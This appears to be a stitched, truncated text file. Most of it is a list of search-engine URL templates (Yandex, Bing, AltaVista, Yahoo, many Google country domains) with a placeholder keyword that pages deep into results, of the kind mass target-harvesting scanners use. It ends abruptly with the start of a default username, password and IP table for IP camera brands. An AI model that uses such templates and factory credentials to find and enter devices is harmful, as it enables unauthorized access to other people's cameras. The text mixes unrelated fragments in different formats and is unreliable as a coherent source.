"International","Yandex 6 (Next 10)","http://www.yandex.ru/yandpage?q=375914754&p=1&ag=h&qs=text%3D{SEARCH_KEYWORD}","1"
"International","Yandex 7 (Next 10)","http://www.yandex.ru/yandpage?q=375914754&p=1&ag=h&qs=text%3D{SEARCH_KEYWORD}","1"
"International","Yandex 8 (Next 10)","http://www.yandex.ru/yandpage?q=375914754&p=2&ag=h&qs=text%3D{SEARCH_KEYWORD}","1"
"International","Yandex 9 (Next 10)","http://www.yandex.ru/yandpage?q=375914754&p=2&ag=h&qs=text%3D{SEARCH_KEYWORD}","1"
http://www.bing.com/search?q={Ux0r_Arama_Key}&count=50&first=1
http://www.bing.com/search?q={Ux0r_Arama_Key}&count=50&first=51
http://www.bing.com/search?q={Ux0r_Arama_Key}&count=50&first=101
http://www.bing.com/search?q={Ux0r_Arama_Key}&count=50&first=151
http://www.bing.com/search?q={Ux0r_Arama_Key}&count=50&first=201
http://altavista.com/web/results?pg=aq&avkw=xytx&aqmode=s&aqa={Ux0r_Arama_Key}&kgs=0&kls=0&dt=tmperiod&d2=0&rc=dmn&sc=on&nbq=50
http://altavista.com/web/results?pg=aq&avkw=xytx&aqmode=s&aqa={Ux0r_Arama_Key}&kgs=0&kls=0&dt=tmperiod&d2=0&rc=dmn&sc=on&nbq=50&stq=50
http://altavista.com/web/results?pg=aq&avkw=xytx&aqmode=s&aqa={Ux0r_Arama_Key}&kgs=0&kls=0&dt=tmperiod&d2=0&rc=dmn&sc=on&nbq=50&stq=100
http://altavista.com/web/results?pg=aq&avkw=xytx&aqmode=s&aqa={Ux0r_Arama_Key}&kgs=0&kls=0&dt=tmperiod&d2=0&rc=dmn&sc=on&nbq=50&stq=150
http://search.yahoo.com/search?x=op&va={Ux0r_Arama_Key}&va_vt=any&vst=0&vd=all&fl=0&vf=all&ei=UTF-8&vm=p&n=100
http://search.yahoo.com/search?va={Ux0r_Arama_Key}&va_vt=any&vst=0&fl=0&vf=all&ei=UTF-8&vm=p&n=100&b=101
http://search.yahoo.com/search?va={Ux0r_Arama_Key}&va_vt=any&vst=0&fl=0&vf=all&ei=UTF-8&vm=p&n=100&b=201
http://www.google.com/search?q={Ux0r_Arama_Key}&num=100&start=0
http://www.google.com/search?q={Ux0r_Arama_Key}&num=100&start=100
http://www.google.com/search?q={Ux0r_Arama_Key}&num=100&start=200
http://www.google.com/search?q={Ux0r_Arama_Key}&num=100&start=0
http://www.google.com/search?q={Ux0r_Arama_Key}&num=100&start=100
http://www.google.com/search?q={Ux0r_Arama_Key}&num=100&start=200
http://www.google.com.hk/search?q={Ux0r_Arama_Key}&num=100&start=0
http://www.google.com.hk/search?q={Ux0r_Arama_Key}&num=100&start=100
http://www.google.com.hk/search?q={Ux0r_Arama_Key}&num=100&start=200
http://www.google.de/search?q={Ux0r_Arama_Key}&num=100&start=0
http://www.google.de/search?q={Ux0r_Arama_Key}&num=100&start=100
http://www.google.de/search?q={Ux0r_Arama_Key}&num=100&start=200
http://www.google.co.uk/search?q={Ux0r_Arama_Key}&num=100&start=0
http://www.google.co.uk/search?q={Ux0r_Arama_Key}&num=100&start=100
http://www.google.co.uk/search?q={Ux0r_Arama_Key}&num=100&start=200
http://www.google.co.za/search?q={Ux0r_Arama_Key}&num=100&start=0
http://www.google.co.za/search?q={Ux0r_Arama_Key}&num=100&start=100
http://www.google.co.za/search?q={Ux0r_Arama_Key}&num=100&start=200
http://www.google.com.br/search?q={Ux0r_Arama_Key}&num=100&start=0
http://www.google.com.br/search?q={Ux0r_Arama_Key}&num=100&start=100
http://www.google.com.br/search?q={Ux0r_Arama_Key}&num=100&start=200
http://www.google.com.ar/search?q={Ux0r_Arama_Key}&num=100&start=0
http://www.google.com.ar/search?q={Ux0r_Arama_Key}&num=100&start=100
http://www.google.com.ar/search?q={Ux0r_Arama_Key}&num=100&start=200
http://www.google.com.au/search?q={Ux0r_Arama_Key}&num=100&start=0
http://www.google.com.au/search?q={Ux0r_Arama_Key}&num=100&start=100
http://www.google.com/search?q={Ux0r_Arama_Key}&num=100&start=0
http://www.google.com/search?q={Ux0r_Arama_Key}&num=100&start=100
http://www.google.com/search?q={Ux0r_Arama_Key}&num=100&start=200
http://www.google.com/search?q={Ux0r_Arama_Key}&num=100&start=300
http://www.google.com/search?q={Ux0r_Arama_Key}&num=100&start=400
http://www.google.com.br/search?q={Ux0r_Arama_Key}&num=100&start=0
http://www.google.com.br/search?q={Ux0r_Arama_Key}&num=100&start=100
http://www.google.com.br/search?q={Ux0r_Arama_Key}&num=100&start=200
http://www.google.com.br/search?q={Ux0r_Arama_Key}&num=100&start=300
http://www.google.com.br/search?q={Ux0r_Arama_Key}&num=100&start=400
http://www.google.fr/search?q={Ux0r_Arama_Key}&num=100&start=0
http://www.google.fr/search?q={Ux0r_Arama_Key}&num=100&start=100
http://www.google.fr/search?q={Ux0r_Arama_Key}&num=100&start=200
http://www.google.fr/search?q={Ux0r_Arama_Key}&num=100&start=300
http://www.google.fr/search?q={Ux0r_Arama_Key}&num=100&start=400
http://www.google.de/search?q={Ux0r_Arama_Key}&num=100&start=0
http://www.google.de/search?q={Ux0r_Arama_Key}&num=100&start=100
http://www.google.de/search?q={Ux0r_Arama_Key}&num=100&start=200
http://www.google.de/search?q={Ux0r_Arama_Key}&num=100&start=300
http://www.google.de/search?q={Ux0r_Arama_Key}&num=100&start=400
http://www.google.co.in/search?q={Ux0r_Arama_Key}&num=100&start=0
http://www.google.co.in/search?q={Ux0r_Arama_Key}&num=100&start=100
http://www.google.co.in/search?q={Ux0r_Arama_Key}&num=100&start=200
http://www.google.co.in/search?q={Ux0r_Arama_Key}&num=100&start=300
http://www.google.co.in/search?q={Ux0r_Arama_Key}&num=100&start=400
http://www.google.co.il/search?q={Ux0r_Arama_Key}&num=100&start=0
http://www.google.co.il/search?q={Ux0r_Arama_Key}&num=100&start=100
http://www.google.co.il/search?q={Ux0r_Arama_Key}&num=100&start=200
http://www.google.co.il/search?q={Ux0r_Arama_Key}&num=100&start=300
http://www.google.co.il/search?q={Ux0r_Arama_Key}&num=100&start=400
http://www.google.it/search?q={Ux0r_Arama_Key}&num=100&start=0
http://www.google.it/search?q={Ux0r_Arama_Key}&num=100&start=100
http://www.google.it/search?q={Ux0r_Arama_Key}&num=100&start=200
http://www.google.it/search?q={Ux0r_Arama_Key}&num=100&start=300
http://www.google.it/search?q={Ux0r_Arama_Key}&num=100&start=400
http://www.google.co.jp/search?q={Ux0r_Arama_Key}&num=100&start=0
http://www.google.co.jp/search?q={Ux0r_Arama_Key}&num=100&start=100
http://www.google.co.jp/search?q={Ux0r_Arama_Key}&num=100&start=200
http://www.google.co.jp/search?q={Ux0r_Arama_Key}&num=100&start=300
http://www.google.co.jp/search?q={Ux0r_Arama_Key}&num=100&start=400
http://www.google.cn/search?q={Ux0r_Arama_Key}&hl=zh-CN&start=100&start=0
http://www.google.cn/search?q={Ux0r_Arama_Key}&hl=zh-CN&start=100&start=100
http://www.google.cn/search?q={Ux0r_Arama_Key}&hl=zh-CN&start=100&start=200
http://www.google.cn/search?q={Ux0r_Arama_Key}&hl=zh-CN&start=100&start=300
http://www.google.cn/search?q={Ux0r_Arama_Key}&hl=zh-CN&start=100&start=400
http://www.google.com.au/search?q={Ux0r_Arama_Key}&num=100&start=200
http://www.google.nl/search?q={Ux0r_Arama_Key}&num=100&start=0
http://www.google.nl/search?q={Ux0r_Arama_Key}&num=100&start=100
http://www.google.nl/search?q={Ux0r_Arama_Key}&num=100&start=200
http://www.google.be/search?q={Ux0r_Arama_Key}&num=100&start=0
http://www.google.be/search?q={Ux0r_Arama_Key}&num=100&start=100
http://www.google.be/search?q={Ux0r_Arama_Key}&num=100&start=200
http://www.google.ca/search?q={Ux0r_Arama_Key}&num=100&start=0
http://www.google.ca/search?q={Ux0r_Arama_Key}&num=100&start=100
http://www.google.ca/search?q={Ux0r_Arama_Key}&num=100&start=200
http://www.google.cl/search?q={Ux0r_Arama_Key}&num=100&start=0
http://www.google.cl/search?q={Ux0r_Arama_Key}&num=100&start=100
http://www.google.cl/search?q={Ux0r_Arama_Key}&num=100&start=200
http://www.google.am/search?q={Ux0r_Arama_Key}&num=100&start=200
http://www.google.cz/search?q={Ux0r_Arama_Key}&num=100&start=0
http://www.google.cz/search?q={Ux0r_Arama_Key}&num=100&start=100
http://www.google.cz/search?q={Ux0r_Arama_Key}&num=100&start=200
http://www.google.gr/search?q={Ux0r_Arama_Key}&num=100&start=0
http://www.google.gr/search?q={Ux0r_Arama_Key}&num=100&start=100
http://www.google.gr/search?q={Ux0r_Arama_Key}&num=100&start=200
http://www.google.ch/search?q={Ux0r_Arama_Key}&num=100&start=0
http://www.google.ch/search?q={Ux0r_Arama_Key}&num=100&start=100
http://www.google.ch/search?q={Ux0r_Arama_Key}&num=100&start=200
http://www.google.dk/search?q={Ux0r_Arama_Key}&num=100&start=0
http://www.google.dk/search?q={Ux0r_Arama_Key}&num=100&start=100
http://www.google.dk/search?q={Ux0r_Arama_Key}&num=100&start=200
http://www.google.fr/search?q={Ux0r_Arama_Key}&num=100&start=0
http://www.google.fr/search?q={Ux0r_Arama_Key}&num=100&start=100
http://www.google.fr/search?q={Ux0r_Arama_Key}&num=100&start=200
http://www.google.am/search?q={Ux0r_Arama_Key}&num=100&start=0
http://www.google.am/search?q={Ux0r_Arama_Key}&num=100&start=100

For other brands usernames and passwords please see below:

Camera Manufacturer Username Password Default IP 3xLogic  admin 12345 192.0.0.64 ACTI Admin or admin 1...